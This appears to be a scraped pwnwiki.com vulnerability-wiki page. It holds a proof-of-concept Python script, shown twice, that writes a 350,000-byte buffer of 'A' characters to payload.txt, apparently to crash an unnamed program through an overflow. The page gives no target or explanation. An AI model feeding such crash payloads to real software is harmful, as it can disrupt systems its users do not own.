免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
POC
#!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
#!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
PWNWIK.COM==免费、自由、人人可编辑的漏洞库